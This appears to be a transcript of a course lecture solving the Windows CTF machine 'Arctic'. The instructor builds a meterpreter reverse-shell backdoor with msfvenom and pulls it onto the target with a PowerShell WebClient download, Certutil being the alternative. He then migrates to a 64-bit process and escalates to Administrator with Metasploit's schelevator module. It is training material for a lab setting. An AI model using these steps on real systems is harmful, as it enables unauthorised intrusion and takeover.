Start course

In this course, we explore pentesting and privilege escalation as we solve a Windows virtual machine called Arctic.


Hi. Within this lecture, we're going to try and escalate our privilege. So, in order to do that, I'm going to show you a new technique. So, if you come over here with a shell, then you can try to actually escalate your shell into a meterpreter shell. Anyway, because as you know, we tried to get a meterpreter shell, but we actually tried to discover a way to get that, but we haven't found it yet. But since now we are inside of the network, we hacked into the machine, then we can try to create a new shell and upload it over here and get like a meterpreter shell back. And by the way, I just mean regular backdoor.exe, okay? So, how do we do it? We can create, and easily with msfvenom, right? We can come over here and just run the msfvenom with a meterpreter payload like windows/meterpreter/reverse_tcp, as usual, okay? And I'm going to give the LHOST and LPORT as usual. And for the LPORT, I'm going to choose something other than 4444. I'm going to go for 1234 because we are already using that. And the format will be an exe, and I'm going to save it under my /var/www/html/ which is my web server route, and I'm going to call it mybackdoor.exe. So, this is basically a backdoor that we have seen in the complete Ethical Hacking course, if you have gotten that from us. And that's it. That's how we create a backdoor. So, rather than sending backdoor to a victim, we're just going to upload it ourselves. And in order to do that, we can use the Certutil that we have seen before. But this time if the Certutil doesn't actually run or if Certutil doesn't work, I'm just going to show you a way to do it, an alternative way to do it as well. And it's done with the PowerShell, okay? It's a little bit long command and you need to memorize it, so it's a little bit annoying. But again, it will be very helpful for you if you cannot download a file with a Certutil. So, you're going to have to take a note of this one, and I'm just going to just read it through my notes in order to write it over here, okay? So, this is PowerShell. And again, PowerShell is a shell that we actually use in the Windows operating system. It leads us to run the commands in a more powerful or more privileged way if we can actually do this. And, of course, it doesn't end there. You can run a lot of commands in order to effectively manage your Windows operating system. And so the syntax goes like this. I'm going to say "(New-Object System.Net.WebClient)", okay? So, this is a WebClient in order to make a request to web. And this is exactly what we are trying to do. So, we are creating a new object of the WebClient, and you can just call .Downloadfile method of that WebClient object, okay? So, and after that you're going to have to specify the URL over here to download the file that you need to download. And I'm doing this with single quotation mark. As you can see, I'm going to write mybackdoor.exe over here. Of course, you're going to have to write your own name and your own IP address. And after that, you're going to have to specify what to call it after downloading. So, I'm going to call this mybackdoor.exe one more time and close the single quotation mark over here. Close the parenthesis and close the double quotation mark that we have opened before. So, syntax has to be exactly like this, okay? So, over here we're creating a new WebClient and using the Downloadfile method of that WebClient in order to make a request to this backdoor.exe, and after that we're going to save it. Now, if I run this, it can actually download this and save it. And by the way, if it doesn't work over here. You can try to go into the temp folder and try over there. But as you can see, I believe it's working or it's trying to work. It's downloading that exe file. Let me try and see if it's going to work or not. And again, sometimes Certutil doesn't let you do that, and this PowerShell will. So, it's good to know the both of them. So, take note of this command and also the result it will command as well, like the URL casting that we have seen before. Now, here you go. I believe now it's done. It took a while. I'm going to run dir. And here you go. Now we see the mybackdoor.exe. And after completion, maybe you're going to have to hit 'Enter' in order to trigger it a little bit. Now, I'm going to run msfconsole because we're going to create another listener for us, this time with a meterpreter payload so that we can get a meterpreter shell back. And if we get the meterpreter shell back, we can easily run the post exploit modules. So, that's why I'm having this hard time over here, okay? So, that it can make our job very easy afterwards. So, I'm going to set my payload to (windows/meterpreter/reverse_tcp). If you say 'Show options', you will see that you're going to have to write the lhost. And of course, we're going to have to change the lport as well to 1234. I'm going to exploit -j -z this in background. And now I'm going to run mybackdoor.exe from the Windows over here, and here you go. We have the shell back. So, I'm going to hit 'Enter' and interact with that session. And it has to be sessions. Here you go. Now, if I say getuid, we are ARCTIC\tolis one more time, but this time we have the meterpreter session. So, if I run sysinfo, you will see that I have the current connection with the ARCTC Windows. Very good. Now, again, we did the same thing. We didn't escalate our privilege but this time we escalated our shell. So, we are in a Windows meterpreter shell right now. If you run shell, we can go back to the shell that we were currently in, but this time in the meterpreter, I can run post/multi/recon/local_exploit_suggester. Not xploit but exploit_suggester, over here. Great. Now, if I run this, it will automatically collect all the data regarding this exploit suggestions, it will display some results back to us. And here you go. It will try 34 exploit checks. Great. Now, we see some of the things that we have seen before over here, like schelevator, and we have the /ms 16 075 reflection here as well. This time, I'm going to go for the schelevator because as I said before, this is one of the most popular ones and we haven't seen it yet. So, if you go over here to and search for the schelevator yourselves, then you're going to see the Task Scheduler XML Privilege Escalation thingy. So, go into the rapid7. Of course, you can go for the other ones here as well. You can just see the descriptions over here as well as the usage as well, okay? So, it seems that we can run this on both the architectures like 32-bit, 64-bit. It says that it's collecting the local exploit for 32-bit over here, but our architecture seems to be 64-bit. So, I don't know whether it's going to cause any problems or not, but we can easily try this, right? Because we already have the module over here. All you got to do is just copy this, okay? And as a use in the meterpreter session. And of course, we're going to have to just background this, and then we can say use in the metasploit session, not in the meterpreter session. So, when you do that, if you run 'Show Options', you will see that you're going to have to set the session, and our session is 1, so I'm going to set the lhost to and for the lport I'm going to choose something that we have never used before, 5555. Here you go. I'm going to run exploit and see. It says that there's a problem over here. It says that try using an x64 meterpreter. It's very good that we get this error back. As you can see, it asks for a specific version of the environment over here. So, we're going to have to be in the 64-bit environment and we can try to switch it. So, we haven't seen that before, so this is a great opportunity for us. So, I'm going to go into the session 1. So, I'm going to say getuid or sysinfo rather than getuid. We see that our architecture is already x64 but I believe our session is in the 32-bit, okay? As you can see, the meterpreter session is in the 32-bit, so that's what causing the problems. So, what we can do, we can try to migrate our process into something, 64-bit. So, in order to do that, you're going to have to display the processes that is being currently running over here with the ps command. So, if you run ps command, you can see all the process list in the Windows operating system. And as you can see, our cmd.exe is the x86, which is 32-bit. Over here, we're going to have to migrate it into something like a 64-bit over here, or maybe we can just go into this one, j run.exe, which is the ColdFusion. So, all you got to do is just run migrate 1184, which is the PID, okay? And if it doesn't work, you can try to go into other x64-bits as well. But I believe this worked very well. Now, if you have gotten the complete Ethical Hacking codes, you know what it means to migrate over here. And as you can see, the meterpreter is now in the x64-bit as well. So, we generally do this migration in order to persist our session, but this time we did it in order to go into a 64-bit session which is most of the time much more stable by the way. Now, I'm going to come over here and say 'Show Options' to the schelevator. Our session is still in one, our lhost and lport is still okay. I'm going to run exploit. And this time as you can see, it's working. It didn't complain about the 64-bit thingy. And now I'm going to say getuid and here you go. Now we are root that we are administrator. So, we managed to escalate our privileges. So, if I run pwd I'm in the system32. I'm going to go back. And let me run pwd, I'm in the C. I'm going to go into the Users, and I'm going to run ls. To see the Administrator folder over here, I'm going to go into the Administrator. And if I run ls, I can see all the things regarding to Administrator. I'm going to go into the Desktop because that's where we find the root flag in the hector box, okay? I'm going to cat this thing out, and here you go. We managed to get the root flag. So, this is how you hack the arctic. Again, this is not a very good CTF because we're going to have to wait like 10 seconds before we do anything. But again, it teaches us a lot and we haven't seen this schelevator or we haven't seen the migration. We haven't seen a lot of things in this section that we haven't covered before. So, that's why we have chosen to do this. So far so good. I hope you enjoyed this section. See you in the next one for closing.


About the Author
Learning Paths

Atil is an instructor at Bogazici University, where he graduated back in 2010. He is also co-founder of Academy Club, which provides training, and Pera Games, which operates in the mobile gaming industry.